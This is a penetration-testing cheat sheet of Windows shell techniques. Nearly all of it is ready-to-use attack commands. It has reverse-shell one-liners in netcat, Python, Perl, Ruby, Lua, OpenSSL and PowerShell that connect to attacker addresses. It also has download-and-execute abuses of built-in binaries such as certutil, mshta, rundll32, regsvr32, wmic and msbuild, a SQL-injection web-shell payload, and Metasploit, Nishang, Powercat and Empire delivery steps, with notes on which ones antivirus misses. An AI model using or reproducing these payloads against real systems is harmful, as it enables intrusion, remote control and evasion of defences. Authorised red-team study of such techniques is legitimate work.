Shells - Windows

The page lolbas-project.github.io is for Windows like https://gtfobins.github.io/ for linux. Obviously there isn't SUID files or sudo privileges in Windows, but it's useful to know how some binaries can be (ab)used perform some kind of unexpected actions like execute arbitrary code.

CMD

python3 /home/kali/Tools/smbserver.py -smb2support Share /home/kali/Tools

cmd.exe /c //192.168.49.239/Share/nc.exe -e cmd.exe 192.168.49.239 21

NC

nc.exe -e cmd.exe <Attacker_IP> <PORT>
    
    
                    

Shell From SQL Injection

# windows
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
# linux
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'

Certutil

Download a B64dll, decode it and execute it.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Download a B64exe, decode it and execute it.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

SBD

sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. sbd.exe (part of the Kali linux distribution: /usr/share/windows-resources/sbd/sbd.exe) can be uploaded to a Windows box as a Netcat alternative.

Python

#WindowsC:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

#Windowsruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSH

Attacker (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificateopenssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commandsopenssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

Victim

#Linuxopenssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>​#Windowsopenssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Process performing network call: powershell.exe Payload written on disk: NO (at least nowhere I could find using procmon !)

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

One liner:

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Get more info about different Powershell Shells at the end of this document

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe Payload written on disk: IE local cache

mshta http://webserver/payload.hta

Process performing network call: mshta.exe Payload written on disk: IE local cache

mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

Example of hta-psh reverse shell (use hta to download and execute PS backdoor)

 <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

You can download & execute very easily a Koadic zombie using the stager hta

hta example

<html><head><HTA:APPLICATION ID="HelloExample"><script language="jscript">        var c = "cmd.exe /c calc.exe";         new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>

Extracted from here​

mshta - sct

<?XML version="1.0"?><!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  --><!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --><!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) --><scriptlet><public></public><script language="JScript"><![CDATA[    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>

Extracted from here​

Mshta - Metasploit

use exploit/windows/misc/hta_servermsf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109msf exploit(windows/misc/hta_server) > exploit

Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Detected by defender

Rundll32

​Dll hello world example​

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Process performing network call: rundll32.exe Payload written on disk: IE local cache

Detected by defender

Rundll32 - sct

<?XML version="1.0"?><!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  --><!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --><scriptlet><public></public><script language="JScript"><![CDATA[    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>

Extracted from here​

Rundll32 - Metasploit

use windows/smb/smb_deliveryrun#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

use stager/js/rundll32_jsset SRVHOST 192.168.1.107set ENDPOINT salesrun#Koadic will tell you what you need to execute inside the victim, it will be something like:rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe Payload written on disk: IE local cache

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

Detected by defender

Regsvr32 -sct

<?XML version="1.0"?><!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll --><!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll --><scriptlet><registration     progid="PoC"    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >    <script language="JScript">        <![CDATA[            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");            ]]></script></registration></scriptlet>

Extracted from here​

Regsvr32 - Metasploit

use multi/script/web_deliveryset target 3set payload windows/meterpreter/reverse/tcpset lhost 10.2.0.5run#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

You can download & execute very easily a Koadic zombie using the stager regsvr

Detected by defender

Cscript/Wscript

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Detected by defender

PS-Bat

\\webdavserver\folder\batchfile.bat

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.batimpacket-smbserver -smb2support kali `pwd`

\\10.8.0.3\kali\shell.bat

Detected by defender

MSIExec

Attacker

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msipython -m SimpleHTTPServer 80

Victim:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

Detected

Wmic

wmic os get /format:"https://webserver/payload.xsl"

Process performing network call: wmic.exe Payload written on disk: IE local cache

Example xsl file:

<?xml version='1.0'?><stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"><output method="text"/>    <ms:script implements-prefix="user" language="JScript">        <![CDATA[            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");        ]]>    </ms:script></stylesheet>

Extracted from here​

Not detected

You can download & execute very easily a Koadic zombie using the stager wmic

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell. Just download this and execute it: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj​

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Not detected

CSC

Compile C# code in the victim machine.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

You can download a basic C# reverse shell from here: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc​

Not deteted

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

I haven't tried it

​https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182​

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache

I haven't tried it

​https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2​

Powershell Shells

PS-Nishang

​https://github.com/samratashok/nishang​

In the Shells folder there are a lot of different shells. To download and execute Invoke-PowerShellTcp.ps1 make a copy of the script, append to the end of the file:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Start serving the script in a web server and execute in the victim:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Defender doesn't detect it as malicious code (yet, 3/04/2019).

TODO: Check other nishang shells

PS-Powercat

​https://github.com/besimorhino/powercat​

Download, start web server, star listener and execute in victim:

 powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender doesn't detect it as malicious code (yet, 3/04/2019).

Other options offered by powercat:

Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...

Serve a cmd Shell:    powercat -l -p 443 -e cmdSend a cmd Shell:    powercat -c 10.1.1.1 -p 443 -e cmdSend a powershell:    powercat -c 10.1.1.1 -p 443 -epSend a powershell UDP:    powercat -c 10.1.1.1 -p 443 -ep -uTCP Listener to TCP Client Relay:    powercat -l -p 8000 -r tcp:10.1.1.16:443Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:    powercat -c 10.1.1.15 -p 443 -e cmd -gStart A Persistent Server That Serves a File:    powercat -l -p 443 -i C:\inputfile -rep

Empire

​https://github.com/EmpireProject/Empire​

Create a powershell launcher, save it in a file and download and execute it.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Detected as malicious code

MSF-Unicorn

​https://github.com/trustedsec/unicorn​

Create a powershell version of metasploit backdoor using unicorn

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Start msfconsole with the created resource:

msfconsole -r unicorn.rc

Start a web server serving the powershell_attack.txt file and execute in the victim:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Detected as malicious code

More

​PS>Attack PS console with some offensive PS modules preloaded (cyphered) https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9​ WinPWN PS console with some offensive PS modules and proxy detection (IEX)